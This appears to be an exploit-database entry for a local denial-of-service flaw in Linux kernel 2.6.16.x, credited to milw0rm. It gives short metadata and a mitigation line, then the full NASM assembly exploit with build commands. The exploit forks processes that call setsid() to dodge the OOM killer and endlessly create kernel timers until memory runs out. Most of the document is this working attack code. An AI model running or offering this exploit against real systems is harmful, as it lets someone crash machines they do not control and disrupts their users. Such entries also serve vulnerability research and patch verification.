Vendor: Linux Kernel
By: milw0rm.com
CVSS: 7.2 (HIGH)
Denial of Service
CWE: 400
Product Name: Linux Kernel
Affected Version From: 2.6.16.x
Affected Version To: 2.6.16.x
Patch Exists: YES
Related CWE: N/A
CPE: o:linux:linux_kernel:2.6.16.x
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2006

Linux Kernel 2.6.16.x OOM Killer Local Denial of Service Vulnerability

This is a local denial-of-service vulnerability in Linux Kernel 2.6.16.x. The exploit creates multiple threads that consume all available memory, causing the system to crash. It calls setsid() so that the threads are not counted as one thread in oom_killer().

Mitigation:

The best way to mitigate this vulnerability is to upgrade to a newer version of the Linux Kernel.
Exploit-DB raw data:

;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o

section .text
   global _start

count   equ     8       ; threads count - do it quicker

_start:
       mov     ebx, count
       call    create_threads
       jmp     done
_pause:
       mov     eax,29          ; sys_pause (helper, never called)
       int     0x80
       ret
create_threads:
       mov     eax,2           ; sys_fork
       int     0x80
       test    eax,eax
       jz      consume
       dec     ebx
       test    ebx,ebx
       jnz     create_threads
       ret
consume:
setsid:         ;       so we won't get counted as one thread in oom_killer()
       xor     ebx,ebx ;       each task will have about 20 oom_score which
       mov     eax,66 ;        is less than 'init' and others
       int     0x80
       push    eax
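loopek:
       mov     eax,259         ; sys_timer_create (i386)
       mov     ebx,0           ; clockid = CLOCK_REALTIME
       mov     ecx,0           ; sevp = NULL
       mov     edx,esp         ; timerid pointer (slot pushed above)
       int     0x80
       jmp     loopek          ; repeat; timers are never deleted
done:
       xor     ebx,ebx
       mov     eax,1           ; sys_exit(0)
       int     0x80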

; milw0rm.com [2006-04-09]